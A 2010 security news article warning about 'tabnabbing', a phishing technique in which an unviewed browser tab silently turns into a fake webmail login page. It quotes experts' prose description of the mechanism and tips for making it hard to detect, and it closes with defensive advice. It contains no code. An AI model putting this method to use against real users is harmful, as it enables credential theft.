Latest Phishing Attack: Tabnabbing

2010-07-14

An article written by Dan Raywood, SC Magazine, warns of a new phishing tactic that targets tabs and is 'likely to fool even the most security-conscious web surfers'.

The attack happens when a user has six or seven tabs open, with one of the tabs (not currently being viewed) containing a script that waits for a few minutes or hours and then discreetly changes both the content of the page and the icon and descriptor in the tab itself so that it appears to be the login page for a webmail account.

Security blogger Brian Krebs stated "In this attack, the phisher need not even change the web address displayed in the browser's navigation toolbar. Rather, this particular phishing attack takes advantage of user trust and inattention to detail. Then, as the user scans their many open tabs, the favicon and title act as a strong visual cue, and the user will most likely simply think they left a webmail tab open."

Krebs continues "When they click back to the fake webmail tab, they'll see the standard webmail login page, assume they've been logged out, and provide their credentials to log in. After the user has entered their login information and sent it back your server, you redirect them to a webmail account. Because they were never logged out in the first place, it will appear as if the login was successful."

Firefox creative lead Aza Raskin is calling this new type of phishing attack 'tabnabbing'. Raskin states, "Every time you include a third-party script on your page, or a Flash widget, you leave yourself wide open for an evil doer to use your website as a staging ground for this kind of attack. If you are the evil doer, you can have this behavior only occur once in a while, and only if the user uses a targeted service. In other words, it could be hard to detect."

Raskin added, "You can also use cross-site scripting vulnerabilities to force the attack to be performed by other websites. And for browsers that do not support changing the favicon, you can use a location.assign call to navigate the page to a controlled domain with the correct favicon. As long as the user wasn't looking at the tab when the refresh occurred (which they won't be), they'll have no idea what hit them. Combine this with lookalike Unicode domain names and even the most savvy user will have trouble detecting anything is amiss."

Raskin recommends that users keep the number of tabs open to a minimum, always check that the URL matches the site before entering any login, financial or identity information and if in doubt - close the tab and navigate to the page again.